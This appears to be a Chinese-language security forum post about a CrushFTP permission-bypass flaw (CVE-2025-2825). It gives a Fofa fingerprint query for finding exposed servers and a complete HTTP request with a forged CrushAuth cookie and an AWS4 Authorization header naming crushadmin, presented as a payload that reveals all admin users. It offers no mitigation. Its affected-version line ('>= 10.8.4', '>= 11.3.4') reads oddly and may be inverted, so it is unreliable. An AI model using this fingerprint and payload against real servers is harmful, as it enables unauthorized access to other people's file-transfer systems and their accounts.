CrushFTP 存在权限绕过漏洞(CVE-2025-2825-网络安全论坛-网络安全-阻击者联盟

CrushFTP 存在权限绕过漏洞(CVE-2025-2825

勾八徽章-人气大使-阻击者联盟等级-LV2-阻击者联盟8天前更新
1980
CrushFTP 是一种广泛使用的多协议文件传输服务器,提供广泛的功能集,包括与 Amazon S3 兼容的 API 访问,CrushFTP 支持多种协议,包括 FTP、SFTP、WebDAV 和 HTTP/S,使其成为一种多功能的文件传输解决方案。
Fofa指纹:
body="crushftp" || icon_hash="-1022206565" || title="CrushFTP WebInterface"

536fea51d720250411072533

影响版本:

CrushFTP 10.* >= 10.8.4      CrushFTP 11.* >= 11.3.4

显示出所有管理用户的Payload:

GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1
Host: 127.0.0.1:8081
Cookie: CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/

d2b5ca33bd20250411072705

评分
欢迎为Ta评分
分享
请登录后发表评论

    没有回复内容

zibll子比主题
本站同款主题模板
zibll子比主题是一款漂亮优雅的网站主题模板,功能强大,配置简单。
查看详情
发布文章发布帖子
扫码添加微信-阻击者联盟
在手机上浏览此页面